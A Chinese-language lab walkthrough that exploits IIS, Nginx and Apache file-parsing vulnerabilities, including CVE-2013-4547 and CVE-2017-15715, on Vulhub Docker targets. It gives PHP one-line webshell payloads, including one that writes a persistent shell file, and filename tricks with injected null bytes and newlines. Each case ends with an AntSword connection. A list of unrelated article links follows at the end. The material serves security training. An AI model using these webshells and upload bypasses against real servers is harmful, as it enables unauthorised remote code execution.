中间件解析漏洞

一:IIS

1.IIS6.X

步骤一:在iis的网站根目录新建⼀个名为x.asp的⽂件

步骤二:在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。

步骤三:在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行

2.IIS7.X

步骤一:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1前面;取消掉,并重启

步骤二:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾

步骤三:将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问

步骤四:蚁剑连接

二:Nginx

1.nginx_parsing

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd nginx/nginx_parsing_vulnerability

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a

<?php @eval($_POST['cmd']);?>

步骤三:访问http://172.16.1.109/uploadfiles/a7c3ce076585477741d951d179ab07dc.jpg/.php

步骤四:蚁剑连接

2.CVE-2013-4547

步骤⼀:使⽤以下命令启动靶机并通过浏览器访问靶场⻚⾯.

cd vulhub-master/nginx/CVE-2013-4547x

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀

步骤三:在hex中将jpg后面第二个空格20改为00,放行

步骤四:访问上传后的文件,抓包

172.16.1.115:8080/uploadfiles/shell.jpg .php

步骤五:在hex中将jpg后面第二个空格20改为00,放行

三.Apache

1.apache_parsing

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd /vulhub/httpd/apache_parsing_vulnerability

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a

<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

步骤三:访问shw.php,蚁剑连接

2.CVE-2017-15715

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd /vulhub/httpd/CVE-2017-15715

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a

<?php @eval($_POST['cmd']);?>,filename为1.php

步骤三:抓包,1.php后面加空格,hex中空格20改为0a

步骤四:放行访问1.php%0A

步骤五:蚁剑连接

相关推荐
Leinwin4 小时前
OpenClaw 多 Agent 协作框架的并发限制与企业化规避方案痛点直击
java·运维·数据库
2401_865382504 小时前
信息化项目运维与运营的区别
运维·运营·信息化项目·政务信息化
漠北的哈士奇4 小时前
VMware Workstation导入ova文件时出现闪退但是没有报错信息
运维·vmware·虚拟机·闪退·ova
如意.7595 小时前
【Linux开发工具实战】Git、GDB与CGDB从入门到精通
linux·运维·git
运维小欣5 小时前
智能体选型实战指南
运维·人工智能
yy55275 小时前
Nginx 性能优化与监控
运维·nginx·性能优化
爱吃土豆的马铃薯ㅤㅤㅤㅤㅤㅤㅤㅤㅤ6 小时前
Linux 查询某进程文件所在路径 命令
linux·运维·服务器
05大叔8 小时前
网络基础知识 域名,JSON格式,AI基础
运维·服务器·网络
安当加密8 小时前
无需改 PAM!轻量级 RADIUS + ASP身份认证系统 实现 Linux 登录双因子认证
linux·运维·服务器
dashizhi20158 小时前
服务器共享禁止保存到本地磁盘、共享文件禁止另存为本地磁盘、移动硬盘等
运维·网络·stm32·安全·电脑